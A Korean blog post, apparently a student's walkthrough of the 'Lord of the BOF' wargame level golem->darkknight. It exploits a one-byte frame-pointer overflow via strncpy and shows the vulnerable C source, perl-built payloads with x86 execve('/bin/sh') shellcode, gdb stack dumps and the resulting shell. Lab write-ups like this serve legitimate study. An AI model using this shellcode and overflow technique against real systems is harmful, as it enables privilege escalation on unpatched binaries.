와나..
http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt
이거 읽으세요. 바로 이해감.
와...
와ㅏ...
밤샌 보람이 있는데요?!
/*
The Lord of the BOF : The Fellowship of the BOF
- darkknight
- FPO
*/
#include <stdio.h>
#include <stdlib.h>
void problem_child(char *src)
{
char buffer[40];
strncpy(buffer, src, 41); /*strncpy(dest, source, #of bytes)- argv[1]에서 버퍼로 41바이트를 복사한다. 버퍼는 40바이트인데, 그래서 뒤에 있는 한 바이트가 이 함수에서 메인함수로 돌아갈 때 사용하는 스택프레임 포인터를 오버플로우하게 된다*/
printf("%s\n", buffer);
}
main(int argc, char *argv[])
{
if(argc<2){
printf("argv error\n");
exit(0);
}
problem_child(argv[1]);
}
[golem@localhost golem]$ ./porkknight `perl -e 'print "\x90\xfc\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x86"x2'`
ü ¿j
XRh//shh/binRSÍ̀ú ¿Mü ¿û ¿ @
Segmentation fault (core dumped)
[golem@localhost golem]$ gdb -q porkknight core
Core was generated by `./porkknight ü ¿j
XRh//shh/binRSÍ̀'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xfc764000 in ?? ()
(gdb) x/40wx $esp
0xbffffa8e: 0xfaecbfff 0xd920bfff 0x43e04005 0xfab44001
0xbffffa9e: 0x6070bfff 0x69804006 0x85004010 0xfac40804
0xbffffaae: 0x81ecbfff 0xfaec4010 0x8466bfff 0x85000804
0xbffffabe: 0xfac40804 0xfc90bfff 0x9090bfff 0x90909090 //여기보면 argv[1]
0xbfffface: 0x90909090 0x6a909090 0x5299580b 0x732f2f68
0xbffffade: 0x622f6868 0xe3896e69 0xe1895352 0xfa8680cd
0xbffffaee: 0x849ebfff 0xfc4d0804 0xfb18bfff 0x09cbbfff
0xbffffafe: 0x00024003 0xfb440000 0xfb50bfff 0x3868bfff
0xbffffb0e: 0x00024001 0x83900000 0x00000804 0x83b10000
0xbffffb1e: 0x846c0804 0x00020804 0xfb440000 0x82e4bfff
(gdb) q
[golem@localhost golem]$ ./porkknight `perl -e 'print "\xc4\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`
úú ¿j
XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @
Illegal instruction (core dumped)
[golem@localhost golem]$ gdb -q a.out core
warning: core file may not match specified executable file.
Core was generated by `./porkknight úú ¿j
XRh//shh/binRSÍ̀À'.
Program terminated with signal 4, Illegal instruction.
#0 0xbffffac4 in ?? ()
(gdb) z
[1]+ Stopped gdb -q a.out core
[golem@localhost golem]$ gdb -q porkknight core
Core was generated by `./porkknight úú ¿j
XRh//shh/binRSÍ̀À'.
Program terminated with signal 4, Illegal instruction.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xbffffac4 in ?? ()
(gdb) x/40wx $esp
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x580b6a90
0xbffffad8: 0x2f685299 0x6868732f 0x6e69622f 0x5352e389
0xbffffae8: 0x80cde189 0xbffffac0 0x0804849e 0xbffffc4d
0xbffffaf8: 0xbffffb18 0x400309cb 0x00000002 0xbffffb44
0xbffffb08: 0xbffffb50 0x40013868 0x00000002 0x08048390
0xbffffb18: 0x00000000 0x080483b1 0x0804846c 0x00000002
0xbffffb28: 0xbffffb44 0x080482e4 0x080484dc 0x4000ae60
0xbffffb38: 0xbffffb3c 0x40013e90 0x00000002 0xbffffc40
0xbffffb48: 0xbffffc4d 0x00000000 0xbffffc78 0xbffffc88
0xbffffb58: 0xbffffca0 0xbffffcbf 0xbffffce1 0xbffffcec
(gdb) q
[golem@localhost golem]$ ./porkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`
úú ¿j
XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @
bash$ gjf
sh: gjf: command not found
bash$ exit
exit
[golem@localhost golem]$ ./darkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`
úú ¿j
XRh//shh/binRSÍ̀úú ¿Mü ¿û ¿ @
bash$ my-pass
euid = 512
이번에 하면서 노트테이킹한거:
argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]
has to equal 41bytes
23byte(쉘코드) 4byte(argv[1] 주소) = 27byte
13byte(nop)
아무것도 안넣어도 segfault가 나서 왜인지 trace를 해보니 strncpy에서 그냥 쭉 계속 해서 나머지 쓰레기값을 넣고있어서 그런거였다.. 멍청멍청 똥멍청 strncpy
strace ./porkknight `perl -e 'print "AAAA"'` -i
노트테이킹한 종잌ㅋㅋㅋ 낙서가 많아보이는건 착각이구여 엄마가 후에 뭐가 이렇게 더럽냐며 버리심ㅋㅋㅋㅋㅋ
LeaveRet에서 후광이 나는군여 보이나여
기분좋네옇
이제 에세이를 써야되는데 2장더써야댐 망함 2시임 프린트도해야댐 망함
이 문제 처음에 막 fpo문서를 봐도 이해가 안가서 풀이를 봤는데도 이해 안가서 그냥 fpo문서 엄청 열심히 읽으니까 막 스택도 그려지고 ebp도 따라갈 수 있게되고 esp가 뭔짓을 하는지도 좀 그려지고 우왕아ㅓㅁㄹㄴㅇㄹ밍ㄹ 스택 늘어나느것도 보이고 leaveret이 뭐를 하는지도 그려지고 와 진짜 이번껀 좀 대박이었어요 그래서 결국 마지막엔 풀이 기억도 안나고 걍 제 힘으로 풀게됬네여 아 완전기분좋다
'STUDY > Lord of the BOF' 카테고리의 다른 글
bugbear->giant(1) (0) | 2014.04.16 |
---|---|
darkknight->bugbear (2) | 2014.04.07 |
skeleton->golem (5) | 2014.03.17 |
vampire->skeleton (2) | 2014.02.25 |
troll->vampire (0) | 2013.12.22 |